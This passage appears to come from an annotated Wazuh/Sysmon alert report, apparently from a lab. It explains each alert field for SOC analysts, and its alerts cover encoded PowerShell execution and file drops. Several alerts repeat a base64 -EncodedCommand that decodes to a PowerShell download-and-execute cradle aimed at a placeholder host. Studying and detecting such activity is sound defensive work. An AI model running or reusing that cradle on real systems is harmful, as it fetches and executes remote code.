data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:15.660+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:15.660+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  66
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534295.1574417
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:13.3701266Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284355
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:12.078 ProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00} ProcessId: 15472 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd51-680a-690b-000000000e00} ParentProcessId: 10148 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:12.078
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd54-680a-6c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15472
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd51-680a-690b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:16.338+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:16.338+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  70
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534296.1582488
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:13.6116365Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284380
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:13.586 ProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00} ProcessId: 15472 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pfax4tpn.eqc.ps1 CreationUtcTime: 2025-04-24 22:38:13.586 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:13.586
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd54-680a-6c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15472
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pfax4tpn.eqc.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:13.586
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:19.057+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:19.057+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  67
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534299.1585257
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:16.7381749Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284469
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:15.366 ProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00} ProcessId: 15624 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00} ParentProcessId: 15472 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:15.366
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd57-680a-6e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd54-680a-6c0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15472
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:19.570+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:19.570+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  71
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534299.1593328
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:16.9762322Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284470
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:16.919 ProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00} ProcessId: 15624 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_zanwxrjo.ewu.ps1 CreationUtcTime: 2025-04-24 22:38:16.916 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:16.919
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd57-680a-6e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15624
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
